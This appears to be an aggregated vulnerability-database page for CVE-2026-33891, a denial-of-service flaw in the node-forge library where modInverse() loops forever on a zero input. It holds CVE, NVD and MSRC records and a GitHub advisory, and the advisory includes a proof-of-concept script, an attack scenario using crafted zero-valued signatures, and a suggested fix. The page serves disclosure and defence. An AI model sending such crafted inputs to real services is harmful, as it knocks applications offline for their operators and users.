Vulnerability-Lookup

CVE-2026-33891 (GCVE-0-2026-33891)

Vulnerability from cvelistv5 – Published: 2026-03-27 20:43 – Updated: 2026-03-30 15:38

Title

Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input

Summary

Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/digitalbazaar/forge/security/a…	x_refsource_CONFIRM
	https://github.com/digitalbazaar/forge/commit/9bb…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	digitalbazaar	forge	Affected: < 1.4.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33891",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-30T15:38:00.562704Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-30T15:38:12.388Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "forge",
          "vendor": "digitalbazaar",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-835",
              "description": "CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-27T20:43:37.725Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
        },
        {
          "name": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
        }
      ],
      "source": {
        "advisory": "GHSA-5m6q-g25r-mvwx",
        "discovery": "UNKNOWN"
      },
      "title": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33891",
    "datePublished": "2026-03-27T20:43:37.725Z",
    "dateReserved": "2026-03-24T15:10:05.682Z",
    "dateUpdated": "2026-03-30T15:38:12.388Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33891\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T21:17:25.817\",\"lastModified\":\"2026-04-08T13:50:28.880\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-835\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digitalbazaar:forge:*:*:*:*:*:node.js:*:*\",\"versionEndIncluding\":\"1.3.3\",\"matchCriteriaId\":\"46CBC667-ED99-4B5B-89C8-428CF52FD3FB\"}]}]}],\"references\":[{\"url\":\"https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\",\"Exploit\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33891\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-30T15:38:00.562704Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-30T15:38:08.073Z\"}}], \"cna\": {\"title\": \"Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input\", \"source\": {\"advisory\": \"GHSA-5m6q-g25r-mvwx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"digitalbazaar\", \"product\": \"forge\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.4.0\"}]}], \"references\": [{\"url\": \"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\", \"name\": \"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023\", \"name\": \"https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-835\", \"description\": \"CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-27T20:43:37.725Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33891\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-30T15:38:12.388Z\", \"dateReserved\": \"2026-03-24T15:10:05.682Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-27T20:43:37.725Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

MSRC_CVE-2026-33891

Vulnerability from csaf_microsoft - Published: 2026-03-02 00:00 - Updated: 2026-04-01 14:37

Summary

Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input

Notes

Additional Resources: To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle

Disclaimer: The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2026-33891

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')

None Available There is no fix available for this vulnerability as of now

References

URL

FKIE_CVE-2026-33891

Vulnerability from fkie_nvd - Published: 2026-03-27 21:17 - Updated: 2026-04-08 13:50

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023	Patch
	security-advisories@github.com	https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx	Vendor Advisory, Exploit

Impacted products

	Vendor	Product	Version
	digitalbazaar	forge	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digitalbazaar:forge:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "46CBC667-ED99-4B5B-89C8-428CF52FD3FB",
              "versionEndIncluding": "1.3.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue."
    }
  ],
  "id": "CVE-2026-33891",
  "lastModified": "2026-04-08T13:50:28.880",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-27T21:17:25.817",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory",
        "Exploit"
      ],
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-835"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-5M6Q-G25R-MVWX

Vulnerability from github – Published: 2026-03-26 21:57 – Updated: 2026-03-27 21:50

Summary

Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input

Details

Summary

A Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Affected Package

Package name: node-forge (npm: node-forge) Repository: https://github.com/digitalbazaar/forge Affected versions: All versions (including latest) Affected file: lib/jsbn.js, function bnModInverse() Root cause component: Bundled copy of the jsbn (JavaScript Big Number) library

Vulnerability Details

Type: Denial of Service (DoS) CWE: CWE-835 (Loop with Unreachable Exit Condition) Attack vector: Network (if the application processes untrusted input that reaches modInverse) Privileges required: None User interaction: None Impact: Availability (process hangs indefinitely) Suggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)

Root Cause Analysis

The BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m. Mathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop. The relevant code path in lib/jsbn.js:

javascriptfunction bnModInverse(m) {
  // ... setup ...
  // No check for this == 0
  // Enters Extended Euclidean Algorithm loop that never terminates when this == 0
}

Attack Scenario

Any application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:

DSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang. Custom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters. Any cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().

A single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.

Proof of Concept

Environment Setup

mkdir forge-poc && cd forge-poc
npm init -y
npm install node-forge

Reproduction (poc.js) A single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.

mkdir forge-poc && cd forge-poc
npm init -y
npm install node-forge
# Save the script below as poc.js, then run:
node poc.js

'use strict';
const { spawnSync } = require('child_process');

const childCode = `
  const forge = require('node-forge');
  // jsbn may not be auto-loaded; try explicit require if needed
  if (!forge.jsbn) {
    try { require('node-forge/lib/jsbn'); } catch(e) {}
  }
  if (!forge.jsbn || !forge.jsbn.BigInteger) {
    console.error('ERROR: forge.jsbn.BigInteger not available');
    process.exit(2);
  }
  const BigInteger = forge.jsbn.BigInteger;
  const zero = new BigInteger('0', 10);
  const mod = new BigInteger('3', 10);
  // This call should throw or return 0, but instead loops forever
  const inv = zero.modInverse(mod);
  console.log('returned: ' + inv.toString());
`;

console.log('[*] Testing: BigInteger(0).modInverse(3)');
console.log('[*] Expected: throw an error or return quickly');
console.log('[*] Spawning child process with 5s timeout...');
console.log();

const result = spawnSync(process.execPath, ['-e', childCode], {
  encoding: 'utf8',
  timeout: 5000,
});

if (result.error && result.error.code === 'ETIMEDOUT') {
  console.log('[VULNERABLE] Child process timed out after 5s');
  console.log('  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');
  process.exit(0);
}

if (result.status === 2) {
  console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());
  console.log('  -> Check your node-forge installation');
  process.exit(1);
}

if (result.status === 0) {
  console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());
  process.exit(1);
}

console.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');
if (result.stderr) console.log('  stderr:', result.stderr.trim());
process.exit(1);

Expected Output

[*] Testing: BigInteger(0).modInverse(3)
[*] Expected: throw an error or return quickly
[*] Spawning child process with 5s timeout...

[VULNERABLE] Child process timed out after 5s
  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)
Verified On

node-forge v1.3.1 (latest at time of writing) Node.js v18.x / v20.x / v22.x macOS / Linux / Windows

Impact

Availability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests. Scope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.

Suggested Fix

Add a zero-value check at the entry of bnModInverse() in lib/jsbn.js:

function bnModInverse(m) {
  var ac = m.isEven();
  // Add this check:
  if (this.signum() == 0) {
    throw new Error('BigInteger has no modular inverse: input is zero');
  }
  // ... rest of the existing implementation ...
}

Alternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "node-forge"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33891"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T21:57:48Z",
    "nvd_published_at": "2026-03-27T21:17:25Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\nAffected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including latest)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3\u20137.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist \u2014 gcd(0, m) = m \u2260 1 for any m \u003e 1. However, the implementation does not check whether the input value is zero before entering the algorithm\u0027s main loop. When this equals 0, the algorithm\u0027s loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\njavascriptfunction bnModInverse(m) {\n  // ... setup ...\n  // No check for this == 0\n  // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification \u2014 A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations \u2014 Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc \u0026\u0026 cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc \u0026\u0026 cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n\u0027use strict\u0027;\nconst { spawnSync } = require(\u0027child_process\u0027);\n\nconst childCode = `\n  const forge = require(\u0027node-forge\u0027);\n  // jsbn may not be auto-loaded; try explicit require if needed\n  if (!forge.jsbn) {\n    try { require(\u0027node-forge/lib/jsbn\u0027); } catch(e) {}\n  }\n  if (!forge.jsbn || !forge.jsbn.BigInteger) {\n    console.error(\u0027ERROR: forge.jsbn.BigInteger not available\u0027);\n    process.exit(2);\n  }\n  const BigInteger = forge.jsbn.BigInteger;\n  const zero = new BigInteger(\u00270\u0027, 10);\n  const mod = new BigInteger(\u00273\u0027, 10);\n  // This call should throw or return 0, but instead loops forever\n  const inv = zero.modInverse(mod);\n  console.log(\u0027returned: \u0027 + inv.toString());\n`;\n\nconsole.log(\u0027[*] Testing: BigInteger(0).modInverse(3)\u0027);\nconsole.log(\u0027[*] Expected: throw an error or return quickly\u0027);\nconsole.log(\u0027[*] Spawning child process with 5s timeout...\u0027);\nconsole.log();\n\nconst result = spawnSync(process.execPath, [\u0027-e\u0027, childCode], {\n  encoding: \u0027utf8\u0027,\n  timeout: 5000,\n});\n\nif (result.error \u0026\u0026 result.error.code === \u0027ETIMEDOUT\u0027) {\n  console.log(\u0027[VULNERABLE] Child process timed out after 5s\u0027);\n  console.log(\u0027  -\u003e modInverse(0, 3) entered an infinite loop (DoS confirmed)\u0027);\n  process.exit(0);\n}\n\nif (result.status === 2) {\n  console.log(\u0027[ERROR] Could not access BigInteger:\u0027, result.stderr.trim());\n  console.log(\u0027  -\u003e Check your node-forge installation\u0027);\n  process.exit(1);\n}\n\nif (result.status === 0) {\n  console.log(\u0027[NOT VULNERABLE] modInverse returned:\u0027, result.stdout.trim());\n  process.exit(1);\n}\n\nconsole.log(\u0027[NOT VULNERABLE] Child exited with error (status \u0027 + result.status + \u0027)\u0027);\nif (result.stderr) console.log(\u0027  stderr:\u0027, result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n  -\u003e modInverse(0, 3) entered an infinite loop (DoS confirmed)\nVerified On\n```\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n  var ac = m.isEven();\n  // Add this check:\n  if (this.signum() == 0) {\n    throw new Error(\u0027BigInteger has no modular inverse: input is zero\u0027);\n  }\n  // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java\u0027s BigInteger.modInverse() throws ArithmeticException).",
  "id": "GHSA-5m6q-g25r-mvwx",
  "modified": "2026-03-27T21:50:24Z",
  "published": "2026-03-26T21:57:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
    },
    {
      "type": "WEB",
      "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/digitalbazaar/forge"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33891 (GCVE-0-2026-33891)

MSRC_CVE-2026-33891

FKIE_CVE-2026-33891

GHSA-5M6Q-G25R-MVWX

Summary

Vulnerability Details

Root Cause Analysis

Attack Scenario

Proof of Concept

Impact

Suggested Fix

Tags

Sightings

Nomenclature